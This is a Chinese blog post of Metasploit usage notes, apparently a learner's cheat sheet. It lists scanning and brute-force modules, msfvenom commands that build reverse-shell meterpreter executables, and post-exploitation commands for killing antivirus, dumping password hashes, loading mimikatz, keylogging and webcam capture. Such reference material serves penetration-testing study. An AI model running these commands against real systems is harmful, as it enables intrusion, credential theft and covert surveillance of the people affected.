msf使用记录

最新推荐文章于 2024-07-15 16:27:13 发布
最新推荐文章于 2024-07-15 16:27:13 发布
阅读量149 收藏
点赞数
文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63303407/article/details/127179812
版权

msf使用记录

专业术语

exploit
攻击工具 代码
payload 
攻击载荷
shellcode
module
模块

基本命令

connect

connect baidu.com 443

image-20220919172239282

show

不在模块之中时

show options
列出metasploit框架中的所有渗透攻击模块
show payloads 
列出所有的攻击载荷
show auxiliary    
列出所有的辅助攻击载荷

image-20220919180036943

当在模块之中时

show options
显示模块的相关信息
show targets
展示可攻击的目标
set rhosts 111.111.111.111
用于设置选项的参数

image-20220919180057496

image-20220919181201982

search

search ms08_067
当对漏洞名字非常清除的时候
search name:mysql
要查找mysql数据库的漏洞
search platform:mysql
列出影响此平台的模块,也就是比较好的漏洞
search type:exploit
特定类型的模块
search name:mysql type:exploit
联合查找
search cve:CVE-2017-8464
通过cve去查找

use

use windows/smb/ms08_067_netapi

image-20220919174547987

back

退出当前调用的模块

info

info
显示模块的相关信息

可用目标(available targets) 就是查看可以攻击哪些操作系统
基本选项(basic options) 调用漏洞需要的相关参数
描述(Description) 漏洞描述和执行过程
参考文档(references)

image-20220919174751106

会话管理

sessions 
会话管理
sessions -l
列出所有会话
sessions -k
终止所有会话
sessions -i id
进入某个会话
sessions -k id
终止某个会话
sessions -v
以详细模式列出会话
sessions -u
在许多平台上将shell升级到 meterpreter会话

在利用的时候想让程序后台运行可使用
exploit -j

进入某个会话之后想返回但是不断开连接可以使用background命令
bg

使用辅助模块

端口扫描

use auxiliary/scanner/portmap/portmap_amp
use auxiliary/scanner/portscan/ftpbounce
use auxiliary/scanner/portscan/tcp
use auxiliary/scanner/portscan/ack
use auxiliary/scanner/portscan/syn
use auxiliary/scanner/portscan/xmas

服务扫描

auxiliary/scanner/ssh/ssh_login		#SSH爆破
auxiliary/scanner/vnc/vnc_none_auth	#VNC空口令扫描
auxiliary/scanner/telnet/telnet_login#SSH爆破
auxiliary/scanner/smb/smb_version	#SMB系统版本扫描
auxiliary/scanner/smb/smb_enumusers	#SMB枚举
auxiliary/scanner/smb/smb_login		#SMB弱口令登录
auxiliary/admin/smb/psexec_command	#登录SMB且执行命令

auxiliary/scanner/mssql/mssql_ping	#MSSQL主机信息扫描
auxiliary/admin/mssql/mssql_enum	#MSSQL枚举
auxiliary/scanner/mysql/mysql_login	#MySQL弱口令扫描
auxiliary/admin/mysql/mysql_enum	#MySQL枚举

攻击载荷和编码

windows
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -f exe > msf.exe

linux
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=10.184.62.17 lport=5555 -f elf >msf.elf

迁移进程

getpid
查看当前shll的进程号
ps
获取目标机正在运行的进程
migrate 476
将shell迁移到pid为476的进程中

命令摘要

run killav
关闭杀毒软件

pwd ls cd

getuid
查看当前权限

getsystem
获取系统管理员权限

hashdump
抓哈希密码

sysinfo
查看系统信息

idletim
查看目标系统已经运行时间

route
查看布标机完整的网络设置

shell
进入目标机shell exit退出shell

background bg
将meterpreter隐藏在后台

upload ./1.txt c:\\1.txt
download c:\\1.txt ./
search -f *.txt -d c://

keyscan_start 
启动键盘记录

keyscan_stop
停止键盘记录

keyscan_dump
转储键盘记录

screenshot
抓取截屏

webcam_list
摄像头列表

webcam_snap
摄像头拍照

webcam_stream
抓取视频

sudo rdesktop -f 目标主机
kali-linux 下登录远程桌面

route add ip 子网掩码 
添加路由 先background


sysinfo
查看目标主机系统信息

run scraper
查看目标主机的详细信息

run hashdump
导出密码的哈希

load kiwi
加载mimikatz

ps
查看目标主机的进程信息

pwd
查看当前目录(windows)

getlwd
查看当前目录(linux)

后渗透模块

run post/windows/manage/migrate           #自动进程迁移
run post/windows/gather/checkvm           #查看目标主机是否运行在虚拟机上
run post/windows/manage/killav            #关闭杀毒软件
run post/windows/manage/enable_rdp        #开启远程桌面服务
run post/windows/manage/autoroute         #查看路由信息
run post/windows/gather/enum_logged_on_users    #列举当前登录的用户
run post/windows/gather/enum_applications       #列举应用程序
run post/windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码
run post/windows/gather/smart_hashdump               #dump出所有用户的hash
wanan0red
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MSF使用记录
舞动的獾
06-29 537
msf架构: Rex:调用的是操作系统中函数库,各种协议的沟通,协议的连接。是MSF依赖的基础。 MSF:core:最底层的库,MSF的核心库。 MSF:base: 由于核心库调用复杂凌乱,整理之后的结构为如下的几个模块,便于调用。 MSF:UI 用户界面。 启动: kali虚拟机下直接点击图标就可以使用 关于MSF数据库 msfdb msfdb init 初始化数据库 msfdb reinit 删除目前的的然后进行初化 msfdb delete 删除数据库,不在使用。 netstat -pa
msf 使用记录
weixin_30532987的博客
02-07 77
1. msfconsole 2. show payloads 3. usewindows/shell/reverse_tcp 4. show options 5. set LHOST 192.168.x.x 6. generate -h 7. generate -f r_tcp.exe -t exe 8. useexploit/m...
MSF使用详解
m0_52051132的博客
10-19 7906
一、 Meterpreter是什么Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。
msf命令全集
06-05
* `db_nmap`:执行 Nmap 并记录输出 * `db_notes`:列出数据库中的所有注释 * `db_services`:列出数据库中的所有服务 * `db_vulns`:列出数据库中的所有漏洞 * `db_workspace`:转换数据库工作区 * `db_import_ip_...
SQLMAP使用笔记.pdf
01-25
2. `--union-cols`: UNION 查询表记录 3. `--union-test`: UNION 语句测试 4. `--union-use`:采用 UNION 注入 六、其他选项 1. `--method`:指定 HTTP 请求方法 2. `--data`:POST 方式提交数据 3. `--cookie`...
MSF Toolkit_zip_
10-03
【标题】"MSF Toolkit_zip_" 指的是Metasploit Framework的一个工具包,它被压缩成ZIP格式以便于分发和使用。Metasploit Framework(简称MSF)是一个广泛使用的开源安全测试平台,用于执行渗透测试和漏洞评估。这个...
元器件应用中的MSF系列MSF7905集成电路实用检测数据
11-20
表中的数据详细记录MSF7905在索尼MDP-U3/D3型VCD影碟机上的工作状态。这些数据包括了正常工作电压值和在路电阻的典型范围,它们是工程师判断元器件是否正常运行的重要依据。工作电压的稳定性直接影响到整个系统的...
kali linux-msf-ssh爆破
10-13
使用 nmap(-A -T4参数) metasploit (直接search 查找,然后 use利用就好了)本模块将测试SSH登录,在一系列的机器和报告成功登录。如果你有一个数据库加载插件和连接到一个数据库,该模块会记录成功登录和HOSTS使...
AI安全系列——[第五空间 2022]AI(持续更新)
最新发布
2201_76139143的博客
07-15 711
最近很长时间没有更新,其实一直在学习AI安全,我原以为学完深度学习之后再学AI安全会更加简单些,但是事实证明理论转实践还是挺困难的,但是请你一定要坚持下去,因为“不是所有的坚持都有结果,但总有一些坚持,能从冰封的土地里,培育出十万朵怒放的蔷薇”题目来源:NSSCTF题目描述:噪声在大数据场景下有着重要的地位。工程师们苦于被噪声污染的数据,同时也使用噪声保护着隐私数据。这个挑战分为两个部分。挑战1:从噪声中恢复隐私向量有A,B两个实体。其中B是普通实体,A则是恶意攻击者。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 1297
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
安全防御-用户认证综合实验
weixin_69863399的博客
07-12 365
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
高效守护:在Eureka中构筑服务的分布式安全防线
2401_85341950的博客
07-15 545
通过上述步骤和代码示例,我们展示了如何在Eureka中实现服务的分布式安全策略。这包括服务认证、授权机制的实现,以及数据传输加密等关键安全措施。Eureka作为服务发现框架,在分布式安全体系中发挥着核心作用。在微服务架构中,服务的安全性不容小觑。通过本文的介绍,我们希望能够帮助读者更好地理解和实现Eureka中的分布式安全策略,确保微服务之间的通信安全,构建一个更加安全、可靠的系统。注意:本文中的代码示例为简化模型,实际应用中应根据具体需求和安全标准进行选择和实现。
非法闯入智能监测摄像机:安全守护的新利器
bova2022的博客
07-15 214
首先,它能够智能分析画面中的人物和物体,通过对比数据库识别可疑目标,自动过滤正常活动,减少误报。此外,很多智能摄像机支持远程监控,用户可以随时通过手机或电脑查看实时画面,确保安全无死角。在商业环境中,摄像机可以有效防止盗窃和破坏,提升商业安全防范水平。总之,非法闯入智能监测摄像机作为现代安防技术的重要组成部分,以其智能、高效的特性,正不断提升人们的安全感。随着技术的持续发展和应用场景的扩大,未来这些摄像机将在保护人们生命和财产安全方面发挥更加重要的作用,为我们的生活带来更多保障。
使用Python实现深度学习模型:模型安全与防御
Echo_Wish的博客
07-12 478
通过以上步骤,我们实现了一个简单的深度学习模型的安全与防御。我们使用CleverHans库生成对抗性样本,并通过对抗性训练提高模型的防御能力。对抗性样本是通过对原始输入进行微小扰动生成的,目的是欺骗模型。我们将使用CleverHans库生成对抗性样本。为了提高模型的防御能力,我们可以使用对抗性训练的方法。对抗性训练是将对抗性样本加入到训练集中进行训练。我们将使用MNIST数据集训练一个简单的卷积神经网络(CNN)模型。我们可以通过对抗性样本评估防御后的模型效果。首先,我们需要安装所需的Python库。
移动应用安全需求分析与安全保护工程
weixin_48579910的博客
07-12 1113
移动应用安全面临许多威胁,包括数据泄露、恶意软件、应用漏洞、不安全的网络通信和数据存储等。通过实施数据保护、安全编码、网络通信安全、应用加固、权限管理、安全更新和用户教育等措施,可以有效地提高移动应用的安全性,保护用户数据和隐私。综合采用安全开发生命周期(SDL)和持续安全监控与响应策略,确保移动应用在整个生命周期内的安全性。Android系统通过一系列系统级、应用级和用户级的安全机制,提供了全面的保护。应用沙盒、权限模型、SELinux、数据加密、应用签名、代码混淆等措施,有效地防止了多种安全威胁。
富格林:曝光纠正安全交易误区
fgl100的博客
07-11 518
因此,贵金属并非完全无风险,投资者仍需注意市场风险。投资者应该理解贵金属市场的复杂性,并将其视为投资组合的一部分,而不是绝对安全的避险资产。同时,通过合理的资产配置和风险管理策略,可以降低贵金属投资的风险。尽管黄金是最受欢迎的贵金属之一,但其他贵金属,如白银、铂金和钯金,同样具有投资潜力。忽视了其他贵金属的投资机会会导致投资组合的单一化,增加了风险。投资者应该考虑将不同类型的贵金属组合在其投资组合中,以实现更好的风险分散和收益潜力。通过选择不同贵金属之间的相关性较低的品种,可以降低整体投资组合的风险。
智能运维提升企业长期安全防御能力
goodxianping的专栏
07-12 678
不难发现,在网络安全问题中,系统漏洞已成为一个热点,CGI攻击检测、系统漏洞、数据库漏洞、不安全的远程端口开放、网络设备漏洞、本地安全检查等问题严重威胁着系统管理者和系统用户的安全。用友作为全球领先的企业数智化软件与服务提供商,不仅能够提供适合企业发展战略与业务需要的数智化系统,而且也提供了完善的信息安全保障体系,让企业客户的业务体系更安全更可控。在此背景下,为了提升企业的网络安全防护能力,确保在真实攻击发生时能够迅速响应、有效抵御并减少损失,众多企业纷纷将“攻防演练”作为提升安全防御体系的重要手段。
亚信安全发布2024年第24期《勒索家族和勒索事件监控报告》
亚信安全官方账号的博客
07-15 487
亚信安全发布2024年第24期《勒索家族和勒索事件监控报告》
centos安装msf
07-27
你可以按照网上的教程进行安装,确保教程详细并记录了每一步操作。\[1\] 2. 下载msf的安装脚本。你可以使用以下命令下载脚本: ``` curl ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值